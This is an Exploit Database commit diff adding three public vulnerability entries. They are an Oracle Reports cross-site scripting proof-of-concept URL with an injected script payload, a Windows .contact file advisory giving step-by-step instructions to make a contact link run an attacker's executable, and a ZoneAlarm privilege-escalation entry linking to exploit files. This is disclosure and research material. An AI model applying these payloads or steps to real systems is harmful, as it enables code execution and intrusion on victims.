DB: 2019-01-18
3 changes to exploits/shellcodes Microsoft Windows CONTACT - Remote Code Execution Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting
This commit is contained in:
Offensive Security
parent
fa261f0558
commit
fade9b8cd4
4 changed files with 99 additions and 0 deletions
11
exploits/multiple/webapps/46187.txt
Normal file
11
exploits/multiple/webapps/46187.txt
Normal file
|
|
@ -0,0 +1,11 @@
|
|||
# Exploit Title: [Cross-site Scripting (XSS)]
|
||||
# Date: [2019-01-15]
|
||||
# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
|
||||
# Vendor Homepage: [https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html]
|
||||
# Version: [12.2.1.3] (REQUIRED)
|
||||
# Tested on: [Windows 10]
|
||||
# CVE : [CVE-2019-2413]
|
||||
|
||||
POC:
|
||||
|
||||
https://<ip>/reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E
|
||||
68
exploits/windows/local/46188.txt
Normal file
68
exploits/windows/local/46188.txt
Normal file
|
|
@ -0,0 +1,68 @@
|
|||
[+] Credits: John Page (aka hyp3rlinx)
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
[Vendor]
|
||||
www.microsoft.com
|
||||
|
||||
|
||||
[Product]
|
||||
Microsoft .CONTACT File
|
||||
|
||||
A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista.
|
||||
This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\.
|
||||
|
||||
|
||||
[Vulnerability Type]
|
||||
Insufficient UI Warning Arbitrary Code Execution
|
||||
|
||||
|
||||
[Security Issue]
|
||||
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
|
||||
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
|
||||
|
||||
The flaw is due to the processing of ".contact" files <c:Url> node param which takes an expected website value, however if an attacker references an
|
||||
executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
|
||||
|
||||
e.g.
|
||||
|
||||
<c:Url c:ElementID="xxxxxxxxxxxxxxxxxxxxxxxx"><c:Value>www.hyp3rlinx.altervista.com</c:Value>
|
||||
|
||||
Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs.
|
||||
Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys.
|
||||
|
||||
The ".\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.
|
||||
This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.
|
||||
|
||||
|
||||
[Exploit/POC]
|
||||
Rename any executable file extension from ".exe" to ".com" to be like a valid web domain name.
|
||||
Create a directory to house the executable file
|
||||
Modify the contact file website link like ---> http.\\www.<executable-name>.com
|
||||
Contact website link now points at "dir .\ executable" ---> http.\\www.<executable-name>.com
|
||||
Compress the files using archive utility and place in webserver for download.
|
||||
|
||||
|
||||
[POC Video URL]
|
||||
https://vimeo.com/311759191
|
||||
|
||||
|
||||
[Disclosure Timeline]
|
||||
Reported to ZDI 2018-11-30
|
||||
This exact same vulnerability exists and affects Microsoft Windows .VCF files sharing the same root cause and was publicly disclosed 2019-01-10.
|
||||
https://www.zerodayinitiative.com/advisories/ZDI-19-013/
|
||||
Public disclosure : January 16, 2019
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
||||
|
||||
hyp3rlinx
|
||||
17
exploits/windows/local/46189.txt
Normal file
17
exploits/windows/local/46189.txt
Normal file
|
|
@ -0,0 +1,17 @@
|
|||
# Exploit Title: Check Point ZoneAlarm Local Privilege Escalation
|
||||
# Date: 1/16/19
|
||||
# Exploit Author: Chris Anastasio
|
||||
# Vendor Homepage: https://www.zonealarm.com/software/free-antivirus/
|
||||
# Software Link: Vulnerable Versions included in repo
|
||||
# Version:
|
||||
ZoneAlarm Free Antivirus + Firewall version: 15.3.064.17729
|
||||
Vsmon version: 15.3.58.17668
|
||||
Driver version: 15.1.29.17237
|
||||
Antivirus engine version: 8.8.1.110
|
||||
Antivirus signature DAT file version: 1297458144
|
||||
# Tested on: Windows 7/Windows 10
|
||||
# Vendor Disclosure: https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk142952
|
||||
|
||||
POC:
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46189.zip
|
||||
|
|
@ -10225,6 +10225,8 @@ id,file,description,date,author,type,platform,port
|
|||
46167,exploits/windows/local/46167.txt,"Microsoft Windows VCF - Remote Code Execution",2019-01-15,hyp3rlinx,local,windows,
|
||||
46185,exploits/windows/local/46185.txt,"Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation",2019-01-16,"Google Security Research",local,windows,
|
||||
46186,exploits/linux/local/46186.rb,"blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)",2019-01-16,Metasploit,local,linux,
|
||||
46188,exploits/windows/local/46188.txt,"Microsoft Windows CONTACT - Remote Code Execution",2019-01-17,hyp3rlinx,local,windows,
|
||||
46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
|
@ -40664,3 +40666,4 @@ id,file,description,date,author,type,platform,port
|
|||
46179,exploits/hardware/webapps/46179.txt,"GL-AR300M-Lite 2.27 - Authenticated Command Injection / Arbitrary File Download / Directory Traversal",2019-01-16,"Pasquale Turi",webapps,hardware,80
|
||||
46180,exploits/hardware/webapps/46180.html,"Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset",2019-01-16,"Adithyan AK",webapps,hardware,80
|
||||
46182,exploits/php/webapps/46182.py,"Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit",2019-01-16,"Larry W. Cashdollar",webapps,php,80
|
||||
46187,exploits/multiple/webapps/46187.txt,"Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting",2019-01-17,"Mohamed M.Fouad",webapps,multiple,443
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue